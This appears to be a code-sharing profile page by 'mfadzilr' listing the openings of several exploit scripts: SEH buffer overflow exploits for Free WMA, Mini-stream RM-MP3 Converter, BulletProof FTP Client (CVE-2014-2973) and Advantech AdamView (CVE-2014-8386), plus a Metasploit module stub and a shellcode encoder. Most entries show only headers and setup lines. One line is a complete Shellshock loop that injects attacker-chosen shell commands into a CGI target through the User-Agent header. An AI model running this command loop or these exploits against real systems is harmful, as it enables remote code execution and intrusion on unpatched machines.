mfadzilr

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Reank = NormalRanking

mfadzilr

while true; do read -p 'pawned>' cmd; cmd="$cmd"; curl -i -X OPTIONS -H "User-Agent: () { :;};echo;/bin/$cmd" "http://localhost/cgi-bin/hello"; done

mfadzilr

#!/usr/bin/env ruby
# Author : Muhamad Fadzil Ramli
# 25/10/2014
# Binary to hexcode

# read bin file
fp = File.open(ARGV[0],"rb")

# read and convert to hex format
def readfile(fp)

mfadzilr

#!/usr/bin/env ruby
# encoding: utf-8
# Author : Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Date : 01/11/2014
# Tested on windows xp sp 3 (en)
# Free WMA SEH exploit (DEP Bypass)

seh = 4104
stackpivot = 88
buf = "A" * 5000

mfadzilr

#!/usr/bin/env ruby
# Exploit Title: Mini-stream RM-MP3 Converter 2.7.3.700 2006.09.29 (.wax) Buffer Overflow
# Date: 26.11.2014
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Vendor Homepage: ??
# Software Link: not available
# Version: 2.7.3.700 2006.09.29
# Discovery: ZoRLu / zorlu@milw00rm.com
# Tested on: Microsoft Windows XP [Version 5.1.2600]

mfadzilr

#!/usr/bin/env ruby
# Exploit Title: Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) SEH Buffer Overflow
# Date: 26.11.2014
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Vendor Homepage: not valid anymore
# Software Link: not available
# Version: 3.1.2.1.2010.03.30
# Discovery: ZoRLu / zorlu@milw00rm.com
# Tested on: Microsoft Windows XP [Version 5.1.2600]

mfadzilr

#!/usr/bin/env ruby
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit
# Date: Dec 03 2014
# Vulnerability Discovery: Gabor Seljan
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Software Link: http://www.bpftp.com/
# Version: 2010.75.0.76
# Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600]
# CVE: CVE-2014-2973
# Notes: bypass stack size limitation for bigger payload. Allocate 2nd

mfadzilr

#!/usr/bin/env ruby
# Exploit Title: Advantech AdamView (.gni) SEH Buffer Overflow
# Date: Dec 09 2014
# Vulnerability Discovery: Daniel Kazimirow and Fernando Paez - Core Security
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Software Link: http://downloadt.advantech.com/download/downloadsr.aspx?File_Id=1-179WGW
# Version: 4.30.003
# Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600]
# CVE: CVE-2014-8386
# Advisory ID: CORE-2014-0008

mfadzilr

#!/usr/bin/env ruby
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit
# Date: Dec 03 2014
# Vulnerability Discovery: Gabor Seljan
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Software Link: http://www.bpftp.com/
# Version: 2010.75.0.76
# Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600]
# CVE: CVE-2014-2973
# Notes: bypass buffer size limitation for bigger payload. Allocate 2nd

mfadzilr

#!/usr/bin/env ruby
# Custom encoder for ADAMView Exploit
# Author : Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Date : 09/12/2014
# code is ugly

require 'metasm'

@shellcode = Array.new()